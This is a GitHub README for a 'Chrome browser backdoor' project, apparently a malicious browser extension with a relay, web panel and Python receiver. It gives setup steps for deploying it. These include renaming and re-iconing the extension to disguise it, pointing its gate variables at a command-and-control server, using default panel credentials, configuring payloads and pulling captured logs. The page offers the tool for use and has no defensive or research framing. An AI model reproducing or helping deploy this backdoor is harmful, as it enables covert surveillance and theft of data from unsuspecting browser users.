Skip to content

Latest commit

 

History

History
65 lines (37 loc) · 1.2 KB

README.md

File metadata and controls

65 lines (37 loc) · 1.2 KB

Chrome browser backdoor

Information

Username panel : root

Password panel : toor

Network

Backdoor => Relais => Web Panel

Extension

backdoor Chrome

Change name, icones, description

change it on manifest

Backdoor chrome

Change Gate on script

js/check.js

web : show.php

    var server_web = "http://localhost:8888/"
    var lock_page = "relais/lock.php"
    var gate_page = "relais/index.php"

Url checker & Payload

Make it on webpanel

backdoor chrome panel

Get the log here

backdoor chrome panel

lock.php

Update lock page with 1

Backdoor lock

Python receiver

Update GATE var on Cbackdoor.py

GATE = "http://localhost:8888/chromebackdoor/web/gate.php?last=1"

Start

python CBackdoor.py

Backdoor chrome python receiver